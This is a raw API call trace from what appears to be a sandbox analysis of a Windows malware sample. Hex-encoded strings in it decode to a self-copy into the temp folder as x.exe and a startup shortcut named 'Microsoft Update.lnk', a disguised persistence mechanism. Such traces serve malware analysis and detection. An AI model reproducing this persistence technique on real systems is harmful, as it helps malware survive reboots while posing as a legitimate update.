lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.638] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.638] lstrlenW (lpString="70") returned 2 [0083.638] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.638] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.638] lstrlenW (lpString="74") returned 2 [0083.638] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.638] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.638] lstrlenW (lpString="46") returned 2 [0083.638] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.638] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.638] lstrlenW (lpString="75") returned 2 [0083.638] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.638] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.638] lstrlenW (lpString="6C") returned 2 [0083.638] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.638] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.638] lstrlenW (lpString="6C") returned 2 [0083.638] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.638] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.638] lstrlenW (lpString="50") returned 2 [0083.639] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.639] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.639] lstrlenW (lpString="61") returned 2 [0083.639] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.639] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.639] lstrlenW (lpString="74") returned 2 [0083.639] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.639] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.639] lstrlenW (lpString="68") returned 2 [0083.639] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.639] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.639] lstrlenW (lpString="20") returned 2 [0083.639] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.639] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.639] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.639] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.639] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.639] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.639] lstrlenW (lpString="20") returned 2 [0083.639] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.639] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.639] lstrlenW (lpString="40") returned 2 [0083.639] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.639] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.639] lstrlenW (lpString="54") returned 2 [0083.639] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.639] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.640] lstrlenW (lpString="65") returned 2 [0083.640] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.640] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.640] lstrlenW (lpString="6D") returned 2 [0083.640] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.640] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.640] lstrlenW (lpString="70") returned 2 [0083.640] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.640] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.640] lstrlenW (lpString="44") returned 2 [0083.640] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.640] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.640] lstrlenW (lpString="69") returned 2 [0083.640] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.640] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.640] lstrlenW (lpString="72") returned 2 [0083.640] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.640] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.640] lstrlenW (lpString="20") returned 2 [0083.640] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.640] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.640] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.640] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.640] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.640] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.640] lstrlenW (lpString="5C") returned 2 [0083.640] lstrlenW (lpString="78") returned 2 [0083.641] lstrlenW (lpString="2E") returned 2 [0083.641] lstrlenW (lpString="65") returned 2 [0083.641] lstrlenW (lpString="78") returned 2 [0083.641] lstrlenW (lpString="65") returned 2 [0083.641] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.641] lstrlenW (lpString="20") returned 2 [0083.641] lstrlenW (lpString="40") returned 2 [0083.641] lstrlenW (lpString="54") returned 2 [0083.641] lstrlenW (lpString="65") returned 2 [0083.641] lstrlenW (lpString="6D") returned 2 [0083.641] lstrlenW (lpString="70") returned 2 [0083.641] lstrlenW (lpString="44") returned 2 [0083.641] lstrlenW (lpString="69") returned 2 [0083.641] lstrlenW (lpString="72") returned 2 [0083.641] lstrlenW (lpString="20") returned 2 [0083.641] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.641] lstrlenW (lpString="2F") returned 2 [0083.641] lstrlenW (lpString="78") returned 2 [0083.641] lstrlenW (lpString="2E") returned 2 [0083.641] lstrlenW (lpString="65") returned 2 [0083.641] lstrlenW (lpString="78") returned 2 [0083.641] lstrlenW (lpString="65") returned 2 [0083.646] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.648] lstrlenW (lpString="20") returned 2 [0083.648] lstrlenW (lpString="40") returned 2 [0083.648] lstrlenW (lpString="53") returned 2 [0083.648] lstrlenW (lpString="74") returned 2 [0083.648] lstrlenW (lpString="61") returned 2 [0083.648] lstrlenW (lpString="72") returned 2 [0083.648] lstrlenW (lpString="74") returned 2 [0083.648] lstrlenW (lpString="75") returned 2 [0083.648] lstrlenW (lpString="70") returned 2 [0083.649] lstrlenW (lpString="44") returned 2 [0083.649] lstrlenW (lpString="69") returned 2 [0083.649] lstrlenW (lpString="72") returned 2 [0083.649] lstrlenW (lpString="20") returned 2 [0083.649] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.649] lstrlenW (lpString="2F") returned 2 [0083.649] lstrlenW (lpString="4D") returned 2 [0083.649] lstrlenW (lpString="69") returned 2 [0083.649] lstrlenW (lpString="63") returned 2 [0083.649] lstrlenW (lpString="72") returned 2 [0083.649] lstrlenW (lpString="6F") returned 2 [0083.649] lstrlenW (lpString="73") returned 2 [0083.650] lstrlenW (lpString="6F") returned 2 [0083.650] lstrlenW (lpString="66") returned 2 [0083.650] lstrlenW (lpString="74") returned 2 [0083.650] lstrlenW (lpString="20") returned 2 [0083.650] lstrlenW (lpString="55") returned 2 [0083.651] lstrlenW (lpString="70") returned 2 [0083.651] lstrlenW (lpString="64") returned 2 [0083.651] lstrlenW (lpString="61") returned 2 [0083.651] lstrlenW (lpString="74") returned 2 [0083.651] lstrlenW (lpString="65") returned 2 [0083.651] lstrlenW (lpString="2E") returned 2 [0083.651] lstrlenW (lpString="6C") returned 2 [0083.651] lstrlenW (lpString="6E") returned 2 [0083.652] lstrlenW (lpString="6B") returned 2 [0083.652] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.652] lstrlenW (lpString="20") returned 2 [0083.652] lstrlenW (lpString="40") returned 2 [0083.652] lstrlenW (lpString="54") returned 2 [0083.652] lstrlenW (lpString="65") returned 2 [0083.652] lstrlenW (lpString="6D") returned 2 [0083.652] lstrlenW (lpString="70") returned 2 [0083.652] lstrlenW (lpString="44") returned 2 [0083.652] lstrlenW (lpString="69") returned 2 [0083.652] lstrlenW (lpString="72") returned 2 [0083.652] lstrlenW (lpString="20") returned 2 [0083.656] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0083.656] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0083.656] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0083.656] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0083.656] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0083.657] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0083.657] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0083.657] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0083.657] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0083.657] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0083.657] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0083.657] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0083.657] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0083.657] CharUpperBuffW (in: lpsz="A5700E02918", cchLength=0xb | out: lpsz="A5700E02918") returned 0xb [0083.657] CharUpperBuffW (in: lpsz="A0F00F04C39", cchLength=0xb | out: lpsz="A0F00F04C39") returned 0xb [0083.657] CharUpperBuffW (in: lpsz="TempDir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0083.657] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf438 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0083.657] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/wl.jpg", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", lpFilePart=0x8cedf4*="wl.jpg") returned 0x29 [0083.657] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\wl.jpg")) returned 0xffffffff [0083.711] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x2ac, ftCreationTime.dwHighDateTime=0x22, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x46, ftLastWriteTime.dwLowDateTime=0x2ac, ftLastWriteTime.dwHighDateTime=0x208, nFileSizeHigh=0x9700c0, nFileSizeLow=0x4, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="\x97P", cAlternateFileName="")) returned 0xffffffff [0083.711] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0083.711] GetLastError () returned 0x6 [0083.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0083.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71da8 | out: hHeap=0x2af0000) returned 1 [0083.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed630 | out: hHeap=0x2af0000) returned 1 [0083.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed4f8 | out: hHeap=0x2af0000) returned 1 [0083.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed4e0 | out: hHeap=0x2af0000) returned 1 [0083.712] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0083.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed4e0 [0083.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f78 [0083.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed4e0 | out: hHeap=0x2af0000) returned 1 [0083.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6f030 [0083.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed3d8 [0083.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed3f0 [0083.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ed8 [0083.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6d8e8 [0083.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed2e8 [0083.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f28 [0083.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed2e8 | out: hHeap=0x2af0000) returned 1 [0083.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6db40 [0083.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed4e0 [0083.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed4f8 [0083.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6f030 | out: hHeap=0x2af0000) returned 1 [0083.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f78 | out: hHeap=0x2af0000) returned 1 [0083.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed3d8 | out: hHeap=0x2af0000) returned 1 [0083.713] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0083.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e68 [0083.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed2e8 [0083.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed3d8 [0083.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f38 [0083.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed690 [0083.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f38 | out: hHeap=0x2af0000) returned 1 [0083.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed690 | out: hHeap=0x2af0000) returned 1 [0083.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed3d8 | out: hHeap=0x2af0000) returned 1 [0083.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed2e8 | out: hHeap=0x2af0000) returned 1 [0083.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e68 | out: hHeap=0x2af0000) returned 1 [0083.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed3f0 | out: hHeap=0x2af0000) returned 1 [0083.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ed8 | out: hHeap=0x2af0000) returned 1 [0083.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed4f8 | out: hHeap=0x2af0000) returned 1 [0083.713] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0083.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0083.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6f030 [0083.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f18 [0083.713] CharUpperBuffW (in: lpsz="A5700E02918", cchLength=0xb | out: lpsz="A5700E02918") returned 0xb [0083.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6f030 | out: hHeap=0x2af0000) returned 1 [0083.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f18 | out: hHeap=0x2af0000) returned 1 [0083.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed2e8 [0083.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71de8 [0083.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed4f8 [0083.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed3d8 [0083.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e38 [0083.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed3f0 [0083.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed6c0 [0083.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71da8 [0083.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed798 [0083.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71da8 | out: hHeap=0x2af0000) returned 1 [0083.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0083.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e18 [0083.714] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0083.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed690 [0083.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed738 [0083.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x29ed708 [0083.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed7e0 [0083.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed690 | out: hHeap=0x2af0000) returned 1 [0083.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x29ed7f8 [0083.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71dd8 [0083.714] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf2b8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0083.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed870 [0083.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2a6cbc8 [0083.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ea8 [0083.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71dd8 | out: hHeap=0x2af0000) returned 1 [0083.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0083.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e18 | out: hHeap=0x2af0000) returned 1 [0083.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed7e0 | out: hHeap=0x2af0000) returned 1 [0083.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed708 | out: hHeap=0x2af0000) returned 1 [0083.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed7f8 | out: hHeap=0x2af0000) returned 1 [0083.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed738 | out: hHeap=0x2af0000) returned 1 [0083.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed798 | out: hHeap=0x2af0000) returned 1 [0083.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed6c0 | out: hHeap=0x2af0000) returned 1 [0083.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed3f0 | out: hHeap=0x2af0000) returned 1 [0083.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e38 | out: hHeap=0x2af0000) returned 1 [0083.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71e88 [0083.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed3f0 [0083.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e38 [0083.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed8b8 [0083.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e38 | out: hHeap=0x2af0000) returned 1 [0083.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71f78 [0083.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed600 [0083.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f58 [0083.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f58 | out: hHeap=0x2af0000) returned 1 [0083.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x29ed7e0 [0083.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6f030 [0083.716] 